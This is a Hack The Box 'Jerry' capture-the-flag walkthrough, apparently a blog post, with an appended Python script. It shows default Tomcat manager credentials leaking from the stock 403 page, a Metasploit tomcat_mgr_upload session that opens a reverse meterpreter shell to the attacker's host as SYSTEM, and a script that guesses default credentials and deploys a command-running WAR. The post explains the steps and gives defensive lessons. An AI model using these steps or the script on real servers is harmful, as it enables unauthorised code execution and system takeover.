<h2>Hack The Box – Jerry – Walkthrough</h2>
<p>Published 2020-08-17, last modified 2020-08-30. Original: https://tech.akat.info/?p=3743</p>
<h3>Port 8080 is open</h3>
<pre class="brush: plain; title: ; notranslate" title="">
# nmap -A -n -F -T5 jerry.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 14:08 UTC
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.050s latency).
Not shown: 99 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
</pre>
<p>Only one of the top 100 ports (<code>-F</code>) answers: Tomcat 7.0.88 on 8080, with the banner and favicon left at their defaults.</p>
<h3>Accessing port 8080</h3>
<p><a href="https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_231521.png"><img src="https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_231521-300x217.png" alt="" width="300" height="217" class="alignnone size-medium wp-image-3744" /></a></p>
<p>Clicking [Manager App] brings up an authentication prompt; after getting the password wrong a few times, a 403 page was displayed.<br />
<a href="https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_231833.png"><img src="https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_231833-300x184.png" alt="" width="300" height="184" class="alignnone size-medium wp-image-3745" /></a></p>
<p>The ID and password printed on that page let me log in to [Manager App]:<br />
ID: tomcat<br />
PW: s3cret</p>
<p>That 403 page is Tomcat's stock manager error page, which includes an example <code>tomcat-users.xml</code> entry (user <code>tomcat</code>, password <code>s3cret</code>, role <code>manager-gui</code>) to show administrators how to grant access. On Jerry the example had been copied verbatim, so the error page itself hands out working credentials. Anyone holding a <code>manager-gui</code> account can upload a WAR through the manager, which is code execution as the account Tomcat runs under.</p>
<h3>Attacking via tomcat</h3>
<p>Uploaded a reverse shell and obtained the flags.</p>
<pre class="brush: plain; title: ; notranslate" title="">
msf5 exploit(windows/http/cayin_xpost_sql_rce) &gt; search tomcat

Matching Modules
================

   #   Name                                                         Disclosure Date  Rank       Check  Description
   -   ----                                                         ---------------  ----       -----  -----------
   0   auxiliary/admin/http/ibm_drm_download                        2020-04-21       normal     Yes    IBM Data Risk Manager Arbitrary File Download
   1   auxiliary/admin/http/tomcat_administration                                    normal     No     Tomcat Administration Tool Default Access
   2   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     No     Tomcat UTF-8 Directory Traversal Vulnerability
   3   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     No     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   4   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   5   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   6   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     No     Hashtable Collisions
   7   auxiliary/scanner/http/tomcat_enum                                            normal     No     Apache Tomcat User Enumeration
   8   auxiliary/scanner/http/tomcat_mgr_login                                       normal     No     Tomcat Application Manager Login Utility
   9   exploit/linux/http/cisco_prime_inf_rce                       2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   10  exploit/linux/http/cpi_tararchive_upload                     2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   11  exploit/multi/http/cisco_dcnm_upload_2019                    2019-06-26       excellent  Yes    Cisco Data Center Network Manager Unauthenticated Remote Code Execution
   12  exploit/multi/http/struts2_namespace_ognl                    2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   13  exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   14  exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   15  exploit/multi/http/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   16  exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   17  exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   18  exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   19  exploit/windows/http/cayin_xpost_sql_rce                     2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   20  exploit/windows/http/tomcat_cgi_cmdlineargs                  2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   21  post/multi/gather/tomcat_gather                                               normal     No     Gather Tomcat Credentials
   22  post/windows/gather/enum_tomcat                                               normal     No     Windows Gather Apache Tomcat Enumeration


Interact with a module by name or index, for example use 22 or use post/windows/gather/enum_tomcat

msf5 exploit(windows/http/cayin_xpost_sql_rce) &gt; use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf5 exploit(multi/http/tomcat_mgr_upload) &gt; show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) &gt; set HttpPassword s3cret
HttpPassword =&gt; s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) &gt; set HttpUsername tomcat
HttpUsername =&gt; tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) &gt; set RHOSTS jerry.htb
RHOSTS =&gt; jerry.htb
msf5 exploit(multi/http/tomcat_mgr_upload) &gt; set RPORT 8080
RPORT =&gt; 8080
msf5 exploit(multi/http/tomcat_mgr_upload) &gt; set LHOST 10.10.14.7
LHOST =&gt; 10.10.14.7
msf5 exploit(multi/http/tomcat_mgr_upload) &gt; exploit

[-] Handler failed to bind to 10.10.14.7:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying heHP934kTwG31cQvov...
[*] Executing heHP934kTwG31cQvov...
[*] Sending stage (53944 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:4444 -&gt; 172.17.0.1:53072) at 2020-08-16 15:28:45 +0000
[*] Undeploying heHP934kTwG31cQvov ...

meterpreter &gt; getuid
Server username: JERRY$
meterpreter &gt; shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88&gt;whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88&gt;type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
</pre>
<p>Two things in that output are worth reading carefully. The "Handler failed to bind to 10.10.14.7:4444" line is not a problem on the target side: Metasploit was running inside a container (the default LHOST was 172.17.0.2), so it could not bind the VPN address, fell back to 0.0.0.0:4444, and the stage was delivered through the container host (172.17.0.1); the module itself did its job of fetching the manager's session cookie and CSRF nonce, uploading the WAR through <code>/manager/html/upload</code>, triggering it and undeploying it afterwards. Second, <code>getuid</code> reports the machine account <code>JERRY$</code> and <code>whoami</code> reports <code>nt authority\system</code>: the Tomcat service runs as SYSTEM, so the manager foothold already has full privilege and both flags are read from the Administrator's desktop without any escalation step. The defensive lessons follow directly: never ship the example credentials from the error page, restrict who can reach the manager application, and run Tomcat under a dedicated low-privilege service account.</p>
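<p>As an added example (not from the original post and not Metasploit's own code), the script below does by hand what <code>exploit/multi/http/tomcat_mgr_upload</code> did above: it tries a constructed list of default manager credentials against <code>/manager/html</code>, classifies the 401/403/200 answers, pulls the CSRF nonce that Tomcat's filter appends to every manager link, uploads a minimal WAR through <code>/manager/html/upload</code>, fetches the deployed JSP (which only prints the account Tomcat runs as, the page's <code>whoami</code> step) and undeploys it again. The target URL, the <code>/probe</code> context name and the credential list are assumptions; only the Python standard library is used.</p>

```python
"""Tomcat Manager: default-credential check and WAR deploy via the HTML manager.
Added example for the Jerry walkthrough; target, context name and credential
list are assumptions, not values from the original post."""
import base64
import io
import re
import uuid
import zipfile
from http.cookiejar import CookieJar
from typing import Optional, Tuple
from urllib import error, request

# Constructed list: tomcat/s3cret is the pair Tomcat's own manager error page
# prints as an example; the others are common guesses.
DEFAULT_CREDS = [("tomcat", "s3cret"), ("tomcat", "tomcat"),
                 ("admin", "admin"), ("admin", ""), ("manager", "manager")]

# Tomcat's CSRF prevention filter puts this nonce on every link/form in /manager/html.
NONCE_RE = re.compile(r"org\.apache\.catalina\.filters\.CSRF_NONCE=([0-9A-Fa-f]+)")

# Probe JSP: reports only the account the container runs as (whoami), which is the
# page's point: a manager-gui login becomes code execution as the service user.
PROBE_JSP = """<%@ page import="java.io.*" %><%
Process p = Runtime.getRuntime().exec("whoami");
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while ((l = r.readLine()) != null) { out.println(l); }
%>"""


def classify_manager_response(status: int, body: str) -> str:
    """Translate a GET /manager/html status into what it tells the attacker."""
    if status == 401:
        return "credentials rejected (Basic auth challenge)"
    if status == 403:
        # Tomcat's stock 403 page embeds an example tomcat-users.xml entry.
        leak = "s3cret" in body
        return "authenticated but no manager-gui role" + (
            " (page leaks example credentials)" if leak else "")
    if status == 200 and "Tomcat Web Application Manager" in body:
        return "manager-gui access: WAR upload is possible"
    return f"unexpected status {status}"


def extract_csrf_nonce(html: str) -> Optional[str]:
    """Nonce from any manager link; required on every state-changing manager URL."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def build_war(jsp: str = PROBE_JSP) -> bytes:
    """Minimal WAR: index.jsp at the root plus an empty Servlet 3.0 web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("index.jsp", jsp)
        z.writestr("WEB-INF/web.xml", '<?xml version="1.0" encoding="UTF-8"?>\n'
                   '<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"/>\n')
    return buf.getvalue()


def multipart(field: str, filename: str, data: bytes) -> Tuple[bytes, str]:
    """Encode one file field exactly as a browser submits the manager's upload form."""
    boundary = uuid.uuid4().hex
    head = (f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; '
            f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n')
    body = head.encode() + data + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def manager_session(base: str, user: str, pw: str):
    """GET /manager/html with Basic auth; keep the JSESSIONID for the later POSTs."""
    opener = request.build_opener(request.HTTPCookieProcessor(CookieJar()))
    token = base64.b64encode(f"{user}:{pw}".encode()).decode()
    opener.addheaders = [("Authorization", f"Basic {token}")]
    try:
        with opener.open(f"{base}/manager/html", timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace"), opener
    except error.HTTPError as e:
        return e.code, e.read().decode(errors="replace"), opener


def deploy_probe(base: str, user: str, pw: str, context: str = "/probe") -> str:
    """Upload the probe WAR, read its output, then undeploy (as the msf module does)."""
    status, html, opener = manager_session(base, user, pw)
    if status != 200:
        raise RuntimeError(classify_manager_response(status, html))
    nonce = extract_csrf_nonce(html)
    body, ctype = multipart("deployWar", context.strip("/") + ".war", build_war())
    url = f"{base}/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE={nonce}"
    opener.open(request.Request(url, data=body, headers={"Content-Type": ctype},
                                method="POST"), timeout=30).read()
    with opener.open(f"{base}{context}/", timeout=30) as r:
        result = r.read().decode(errors="replace").strip()
    url = (f"{base}/manager/html/undeploy?path={context}"
           f"&org.apache.catalina.filters.CSRF_NONCE={nonce}")
    opener.open(request.Request(url, data=b"", method="POST"), timeout=30).read()
    return result


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://jerry.htb:8080"  # assumed target
    for user, pw in DEFAULT_CREDS:
        status, html, _ = manager_session(base, user, pw)
        print(f"{user}:{pw!r} -> {classify_manager_response(status, html)}")
        if status == 200:
            print("probe says:", deploy_probe(base, user, pw))
            break
```

<p>The 403 branch is the one to watch: a 403 from the manager means the credentials were accepted but the user lacks <code>manager-gui</code>, and Tomcat's stock error page for that case still prints the <code>tomcat</code>/<code>s3cret</code> example, which is how the credentials on Jerry were found in the first place. Run against a lab target only.</p>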